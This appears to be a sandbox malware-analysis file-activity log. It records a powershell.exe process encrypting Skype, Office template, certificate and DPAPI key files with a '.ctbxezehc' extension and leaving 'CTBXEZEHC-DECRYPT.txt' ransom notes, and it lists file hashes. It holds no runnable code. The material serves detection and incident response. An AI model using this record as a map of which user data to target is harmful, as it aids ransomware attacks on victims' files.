SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\Normal.dotm.ctbxezehc
binary
MD5: 3307616fae9a44289fbfa3ef71820e70
SHA256: 8491674c309712b7bfe76a11bedb7b729ce339a2ce12664418b8aee5bce479d6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\NormalEmail.dotm
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70.ctbxezehc
binary
MD5: 516f7a5f7e8a3f241163144b1ac77ea3
SHA256: 0066671bf4133c3a3f2f280fe82ae5aab4e26fd349d6d47fc05a719aac6479c5
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\ECCD4BA46722CB4F92060701865DDF09D8AF68B4.ctbxezehc
binary
MD5: 69d30160ef8985af1387983795d6b08b
SHA256: d4b59d3548fedb987c4a6dc5d3a53f831c45362f6320f71028902edda5f60983
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\ECCD4BA46722CB4F92060701865DDF09D8AF68B4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db-journal.ctbxezehc
binary
MD5: ec00f9e7ddbb7e248bdd9888e6aba1b0
SHA256: 81a3a29f952103e2a3c64c4883181b554e565fea8fdf3bf44496c58de7cc924c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Speech\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\shared.xml.ctbxezehc
binary
MD5: 3225758826f2122aae18517f9425d113
SHA256: b31f602920e1f2641256f5bea41b597deda2292013c3fc7d9fa9982daf59486e
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\slimcore-0-4223384469.blog.ctbxezehc
binary
MD5: 662a7f7b61acc72f00ced2821bd2c0e4
SHA256: e9ac0ccf752f3cc0e7c2f1d6b0a23c8978225f3431ed76f58c6e6f378ff04728
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db.ctbxezehc
binary
MD5: d7f97341a34b8ca0843beb3f5484d488
SHA256: 98763d1750ebc87bdcd5effb09b6529aec85f1cbe5567107e79f6200c6079a11
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Stationery\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\shared.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db-journal
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\slimcore-0-4223384469.blog
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-wal.ctbxezehc
binary
MD5: f306bf0ac828017fbabda08507784124
SHA256: ef752254679ca19e589b3041916ded940e442bf0296719e4330a0cb689b0a16e
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\config.xml.ctbxezehc
binary
MD5: 0143277ae7e49ecde41e0ab50bc24f3a
SHA256: 8cad7e4da5763f7afa15ecc20650f0cd9912dc85048eae48ae0e6722c33b85eb
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\config.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-wal
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-shm.ctbxezehc
binary
MD5: a415714a8709a0b02142eeb92de6ed71
SHA256: 2eb60a2d69b91693598c4ba1c4b26955cd532cd93f88654d2caf04cfdc8da5c8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-shm
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\settings.json.ctbxezehc
binary
MD5: 5599100d1870dfb4b585267866bd3b84
SHA256: 4710355d2f96b060d4ed6b3ffd8af7660cef444d74635a80857a38cc6c20e155
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data.ctbxezehc
binary
MD5: 26edfa566129d04748f672ef9a13a2f4
SHA256: abf781b484610bb79337a70f1cbe8429d045678cc406c917a376a2b6ec23a63c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\QuotaManager.ctbxezehc
binary
MD5: 1d6b618e8b74121d2a8a531e883dd547
SHA256: b752ca91f3de06dcc5a09ae88e2e2e8be5665a23097d3ea48e8b3f2bbd2f83ce
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\settings.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\QuotaManager
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl.bak.ctbxezehc
binary
MD5: 28596270316dc9d8913241987a320637
SHA256: c1beed018611c838c31493bac614ef206deee5aa08b9f5a3505ed3ddf32fd5be
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Preferences.ctbxezehc
binary
MD5: 1cff44f341c4a9ea8471cbbf64d5ab07
SHA256: c5e73045f6c94e0ffaef832988968f7eeb723c3a70c5c8d3b3a2abe923f654cb
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl.ctbxezehc
binary
MD5: 211b5a8ef461bd08bf66f9c1c6fd20c6
SHA256: 3b82089d1933a52a7a63d4b6ec33c64a40e8489757b069e30a0449ef0686b6a4
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Preferences
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl.bak
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-0-2576771366.blog.ctbxezehc
binary
MD5: 15f8e5ee0a342ffb5daa905d261f292a
SHA256: 1212e0a73cdb0732fdd605d6b9665e7be25e45a43c7bb7a50a65bd03f05ecf39
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\MANIFEST-000001.ctbxezehc
binary
MD5: 4c4006ff31e98ffc0a249d322e606a5c
SHA256: ac45b68be8dc105001934375830a7a34b151a14df7d2149ddb7a75cf0d64593d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-1-1870167131.blog.ctbxezehc
binary
MD5: c3ea80762b6cd992a713fb65c144d486
SHA256: 92e104bf5e9fb63854e38b28d2e302c99441707b98c4da3222f56b53a83d45ea
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.old.ctbxezehc
fli
MD5: dd3ee791541b4536a4417483fa0d7307
SHA256: fc77494f4aedfcc111d7127102b44163e325e155002cf4261b41758ecb6f3913
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\logs\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-1-1870167131.blog
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-0-2576771366.blog
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\MANIFEST-000001
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000017.log.ctbxezehc
binary
MD5: a3ee13924a43b49cfb9750b13670627b
SHA256: 9657aa0653859f652f2e337dca3414300cc1e251981a4a3a915f9fea923b9c3f
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.ctbxezehc
binary
MD5: 335f5587da333425ca48e5d7043a9f19
SHA256: 8ee83ca3b69d23c7afdce6e36f75b82bb95c7ef93cfeefca60a188d98ce920cd
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\CURRENT.ctbxezehc
binary
MD5: e6e629ca8e31e6cbd50605eb6816b7e7
SHA256: 3b995aa0da09b907275427a1cc21f4ad37ef414304ce7146c19dee17dac33159
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000018.ldb.ctbxezehc
binary
MD5: c4892fb5ec24b13080c6d53161c597f2
SHA256: 57096334ddbed86ec590c9ce6a3f6bc530d6dacb09c3f4a5b3189eaa86eb9611
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.old
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\CURRENT
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000017.log
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000018.ldb
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\MANIFEST-000001.ctbxezehc
binary
MD5: 70048ebc825ca8ebd7a6332654c17399
SHA256: c623198a429843e7d55d6637509169bdeab51a97d6c144fab384c739b698c9f1
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.old.ctbxezehc
binary
MD5: aff75d61e61f7af60bd5fde4acd1a3ef
SHA256: 899a830814d5cf970bc35530450394a334fb7c145a46917c0293d8e4d6453685
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000005.ldb.ctbxezehc
binary
MD5: 4a9809f46aafea04259810b82b7c6fe5
SHA256: dde1245c22ba789dd112efc6f0e5ca73cd73c31369c28d8ab7e785a1c3ff5437
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.old
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000005.ldb
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\MANIFEST-000001
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\000003.log.ctbxezehc
binary
MD5: 479c735d0c0fad07711ccda8e15e66f8
SHA256: 69a94e1c78e38f42433f5a2e51536eecc425fd1e1ba08d390526dabd17eaa9a5
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.ctbxezehc
binary
MD5: f54949ba2e2f5f0179556b84041b65cb
SHA256: 69f08c82bde8924cb6a99edc943a1bffa7d7b9c7158eb71ceebbca6aa2f83591
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\CURRENT.ctbxezehc
binary
MD5: 30d4cf2127521d59ae0d496bcf83073a
SHA256: 08339fce9ff6f09b3bb20dd30d3c5cb5cf5b03aa0fd9d60d0d744ddc4acf1e59
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\CURRENT
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\000003.log
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\ecscache.json.ctbxezehc
binary
MD5: ad3576d00534cf5639814f0fb8c11d4d
SHA256: 123244f5cfaea7b43a95e1ac167232cd43d9d220a0c3bdafe649e7fa4ec9861b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\en-US.bdic.ctbxezehc
binary
MD5: 6bd4993e5539456298cf70b7488a425e
SHA256: ff489e8e599bc8f5d02c18e9f1e0908ee684c1beb6e7bb0256ab085b1aef1c4a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\ecscache.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\en-US.bdic
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\device-info.json.ctbxezehc
binary
MD5: c22e9f15eab6918fa246d77ec49bcbbc
SHA256: 3648f8f5db0b76ed1295283dbb7bc1a0cef649208c9b265fde50781225e48e4f
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\device-info.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cookies.ctbxezehc
binary
MD5: 3f67266e7d9e9004ec875bb028fafc3c
SHA256: 2d41823d2beebf63580ce65e7fee3236e53ad8d89226d511798fe18ebb5780c8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\Databases.db.ctbxezehc
binary
MD5: 4f9f1275f4dc55bd9cd941534e83af98
SHA256: 448e3f8a2538d4654be5fbd8716b9ba606006e662fc7819f12997a132969d822
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\index.ctbxezehc
binary
MD5: 4f2855607b79674cd659283c3af42aed
SHA256: 4d291c0d20602bd57c77ec0e65442bbd7bf1b691cbbff651e2e8d678fcd34cbe
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\Databases.db
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cookies
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\index
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000004.ctbxezehc
binary
MD5: 86f4efd2bd9564ceef067cb1fa244508
SHA256: 5cbd3b42a665e181211f2a2d01d2b24792b4bacfc1e3fc02ada12a9a4f96c526
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000003.ctbxezehc
binary
MD5: 0dfb4f5a9b51139262bfb48393d96b7a
SHA256: 12054918774846c86e60fb9e8fa5cbb174c7936220e33712bdf7811ff03c4a63
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000002.ctbxezehc
binary
MD5: 7c1f09ec1d1f28963b347c3cf0c7b64d
SHA256: 761b2fdfc7ee1c3dce3fbf55c3496c74373dc796fb2745644edf66c18b7c54e1
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000003
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000004
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000001.ctbxezehc
binary
MD5: e42d6fa5b932f038ac40d7832f15faa9
SHA256: f7e2e4637fa7906567f2dc0cc93d1010f1b274bb4fea82603e434652775767ec
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000002
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000001
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_3.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_3
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_2.ctbxezehc
binary
MD5: 774471eabf55b5aa307ad2b5136177d5
SHA256: baae89ca5e2c5cf6fcce119d634a88ddd30f4a2997abf3341e6ac0579de721e0
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_2
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_0.ctbxezehc
binary
MD5: 6654debcc9a70065bb6414ccde2df143
SHA256: 18bc8ccd2a1fa1db1a79a6332d2b3bbce8c3171624fe4b41c54c33b238f90c7d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_1.ctbxezehc
binary
MD5: 587b02f27ad2a720c61808fa513c1ce6
SHA256: a564a6a8a56ad0a86c1a5c1f3d1f5d6424a587ee61619741a7b802d01cfb967a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_1
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_0
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml.ctbxezehc
binary
MD5: 0888b5143793749eb4c2215ff54d5adf
SHA256: 5bd6f1f8c16d401d1186973e96ab0a71cfbe34f16cf4fc0950c1831095ca61a0
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Signatures\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\54ba308a-6a9a-4e0e-b137-b89d3579498b.ctbxezehc
binary
MD5: 974f35c6b5b88d3b3c6bed211602455c
SHA256: 11bbb6b826f07541c0f08cafeb6ff7a8627b0c849009cb6a625bf454c54265b8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\70b9161a-fdec-4cad-9e04-69719330c45e.ctbxezehc
binary
MD5: c9fb8eb694b3fb020716f1ed88caf01b
SHA256: ba64fb227f24beadea462a44e5c810031e3e737bdb3c8e6b79474296223b4049
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\Preferred.ctbxezehc
binary
MD5: f9aabc28df989f9a5c3463731d7af740
SHA256: 4e0cc8dd693a3244a475d41866d0b835ad780f224905dbdc7b85dc96cfee91dc
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\29fd2168-360f-422a-a685-e6961ea74ba8.ctbxezehc
binary
MD5: 919758ebefce6263e2f3e52dd476a338
SHA256: 988433b4a922e3a45d03f3679f2adbae603453fbfe1f4e1c5a70e67e29ac8dc4
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\Preferred
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\70b9161a-fdec-4cad-9e04-69719330c45e
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\54ba308a-6a9a-4e0e-b137-b89d3579498b
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
